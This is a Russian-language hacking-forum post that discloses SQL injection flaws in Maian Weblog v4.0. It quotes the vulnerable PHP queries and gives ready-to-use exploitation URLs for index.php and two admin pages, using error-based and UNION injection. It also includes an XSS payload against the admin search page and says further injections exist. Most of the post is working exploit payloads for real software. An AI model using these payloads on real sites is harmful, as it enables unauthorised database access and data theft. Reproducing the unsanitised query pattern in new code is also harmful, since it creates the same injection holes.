19.04.2010, 19:36
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
Продукт: Maian Weblog v4.0
Требования: mq = off
SQLi в /index.php
PHP код:
....
// Get blog data..
$q_blog = mysql_query("SELECT * FROM ".$database['prefix']."blogs
WHERE id = '$b_post'
LIMIT 1
") or die(mysql_error());
...
эксплуатация:
Код:
/index.php?cmd=blog&post=3'+and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
SQLi в admin/data_files/favourites.php
PHP код:
// Only load data if in edit mode..
if (isset($_GET['edit']))
{
$EDIT = mysql_fetch_object(mysql_query("SELECT * FROM ".$database['prefix']."favourites
WHERE id = '".$_GET['edit']."'
LIMIT 1
")) or die(mysql_error());
}
эксплуатация:
Код:
admin/index.php?cmd=favourites&edit=-1'+union+select+1,2,version()--+
SQLi в admin/data_files/edit.php
PHP код:
$q_edit = mysql_query("SELECT * FROM ".$database['prefix']."blogs
WHERE id = '".$_GET['id']."'
LIMIT 1
") or die(mysql_error());
$EDIT = mysql_fetch_object($q_edit);
эксплуатация:
Код:
admin/index.php?cmd=edit&id=-3'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--+
Также еще работает одни из xss найденная здесь http://seclists.org/bugtraq/2008/May/30
Код:
admin/index.php?cmd=search&search=1&area=blogs&keywords="><script>alert(/xss/)</script>
PS там как минимум есть еще скуля в update и delete. |
|
|